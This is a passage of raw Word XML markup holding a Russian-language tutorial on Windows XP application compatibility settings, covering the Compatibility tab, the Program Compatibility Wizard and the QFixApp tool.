          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1492980" cy="2059200"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="222" name="Рисунок 37" descr="http://helpiks.org/helpiksorg/baza7/54960980560.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helpiks.org/helpiksorg/baza7/54960980560.files/image001.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId209" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1494315" cy="2061042"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Рис</w:t>
      </w:r>
      <w:r w:rsidR="005137F6" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1 Использование вкладки Совместимость (Compatibility) для применения к приложению режима совместимости</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для применения режима совместимости к отдельно взятому приложению:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>С помощью значка Мой компьютер (My Computer) или Проводника Windows (Explorer) найдите и выберите исполняемый файл приложения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Щелкните правой кнопкой мыши на исполняемом файле программы и выберите пункт Свойства (Properties) из контекстного меню.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Выберите вкладку Совместимость (Compatibility), чтобы отобразить окно, приведенное выше на Рис</w:t>
      </w:r>
      <w:r w:rsidR="005137F6" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Установить флажок Запустить программу в режиме совместимости с (Run this program in compatibility mode for) и затем выберите необходимый режим совместимости. Нажмите OK.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Запустите приложение и проверьте эффективность выбранного режима совместимости.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Возможно, Вам придется повторить этот процесс несколько раз, пока не найдете наиболее подходящий режим.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Использование визуальных тем при работе со старыми приложениями</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Если примененный к Вашему приложению режим совместимости не помог, попробуйте использовать настройки из раздела Параметры экрана (Display settings) на вкладке Совместимость (Compatibility).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В состав ОС Windows XP входит несколько визуальных тем, из-за которых могут возникать ошибки при работе старых приложений. Если показалось, что приложение запустилось, но при этом изображение на экране искажено или экран погас, попробуйте установить флажок Отключить визуальное оформление (Disable visual themes). Возможно, также понадобится установить флажки Разрешение экрана 640x480 (Run in 640x480 screen resolution) или 256 цветов (Run in 256 colors).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Использование Мастера совместимости программ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В данном разделе рассматривается использование Мастера совместимости программ для решения различных проблем совместимости, которые могут быть причиной некорректной работы старых приложений в ОС Windows XP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Мастер совместимости программ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ОС Windows XP также включает в себя и другой очень простой подход в решении проблемы совместимости приложений - Мастер совместимости программ. Этот мастер позволяет с легкостью устранить различные проблемы с совместимостью, которые могут препятствовать нормальному выполнению старых программ на ОС Windows XP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Мастер совместимости программ обладает графическим интерфейсом для настройки режимов совместимости и входит в состав Центра справки и поддержки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для использования Мастера совместимости программ:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Нажмите Пуск (Start), Программы (All Programs), Стандартные (Accessories) и затем выберите Мастер совместимости программ (Program Compatibility Wizard).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Внимание: Примите во внимание то, что нельзя использовать данный мастер для того, чтобы заставить нормально работать под ОС Windows XP старые антивирусные программы, дисковые утилиты, программы для резервирования данных, а также системные утилиты. При работе эти старые программы обращаются к драйверам на уровне ядра, что может нарушить стабильность системы. Также не используйте этот мастер для приложений, которые специально разрабатывались для работы в ОС Windows XP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Нажмите Далее (Next). Будет задан вопрос о том, каким образом необходимо открыть программу, для которой требуется настроить параметры совместимости. Будут предложены следующие варианты: Выбрать из списка программ (choose from a list of programs), Использовать программу на компакт-диске (use the program in the CD-ROM drive) или Найти программу вручную (locate the program manually). С помощью переключателя выберите необходимый вариант и нажмите Далее (Next).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Выберите программу, для которой необходимо установить параметры совместимости. Содержание диалогового окна на данном этапе будет зависеть от того, какой вариант Вы выбрали на шаге 2. Нажмите Далее (Next) после того, как выберете приложение,.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Выберите режим совместимости для программы. Выберите рекомендованную для данного приложения операционную систему или систему, в которой приложение работало корректно. Также Вы можете отказаться от применения режима совместимости. Закончив, нажмите Далее (Next).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В списке предоставляется возможность выбора трех дополнительных настроек параметров экрана для установки совместимости программы: 256 цветов (256 colors), Разрешение экрана 640x480 точек (640x480 resolution), Отключить визуальное оформление (disable visual themes). Вы можете, как выбрать, какие из них использовать, так и вообще отказаться от их использования. Закончив, нажмите Далее (Next).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Мастер отобразит всю суммарную информацию о тех настройках, которые Вы выбрали. Если все верно, нажмите Далее (Next), чтобы проверить настройки в работе. Это приведет к запуску программы с выбранными для нее настройками.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Последняя страница мастера позволяет Вам выбрать, что делать дальше: применить эти параметры совместимости и всегда использовать их с этой программой, отменить внесенные изменения из-за того, что они не помогли, или сохранить их и запустить мастер еще раз, чтобы попробовать применить другие параметры совместимости.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>После того, как Мастер совместимости программ закончит свою работу, все исправления совместимости будут применены к Вашей программе и будут действовать до тех пор, пока Вы не удалите их или не переустановите приложение. Вам не нужно будет больше предпринимать никаких дополнительных шагов во время выполнения программы, чтобы пользоваться всеми преимуществами технологии совместимости программ ОС Windows XP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Выявление проблем совместимости с помощью программы QFixApp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В данном разделе рассматриваются различные части программы QFixApp и методы их использования для выявления необходимых приложению исправлений, а также возможность их переноса на другие компьютеры. Также рассматривается вопрос создания XML файла, основанного на собственной базе данных совместимости.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Программа QFixApp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Программа QFixApp является графическим средством, созданным для оказания помощи в нахождении необходимых исправлений совместимости для особых исполняемых файлов. Программа QFixApp обеспечивает Вам прямой доступ к исправлениям совместимости, включенных в состав ОС Windows XP, позволяя контролировать особые исправления совместимости для Ваших старых приложений.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Главное окно программы QFixApp содержит две вкладки:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Вкладка Оболочки (Layers) отображает полный список доступных к использованию режимов (оболочек) совместимости (вид вкладки показан на Рисунке 2).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Вкладка Исправления (Fixes) предоставляет полный список исправлений совместимости доступных в ОС Windows XP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1384950" cy="1822521"/>
            <wp:effectExtent l="19050" t="0" r="5700" b="0"/>
            <wp:docPr id="223" name="Рисунок 39" descr="http://helpiks.org/helpiksorg/baza7/54960980560.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helpiks.org/helpiksorg/baza7/54960980560.files/image002.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId210" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1384867" cy="1822412"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Рис</w:t>
      </w:r>
      <w:r w:rsidR="005137F6" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
      <w:r w:rsidR="005137F6" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Вкладка Оболочки программы QFixApp, используемая для применения режимов совместимости к приложению</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Программа QFixAPP и перенос исправлений на другие компьютеры</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Программу QFixApp наиболее эффективно использовать для определения необходимых точных исправлений совместимости, требуемых приложению. Выявленные таким образом исправления могут быть перенесены на другие компьютеры. Этот процесс включает в себя выбор наиболее подходящего режима совместимости с последующим тестированием работы программы в этом режиме.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Работа выбранного Режима совместимости</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>После того, как Вы смогли найти тот режим совместимости, в котором приложение правильно работает:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
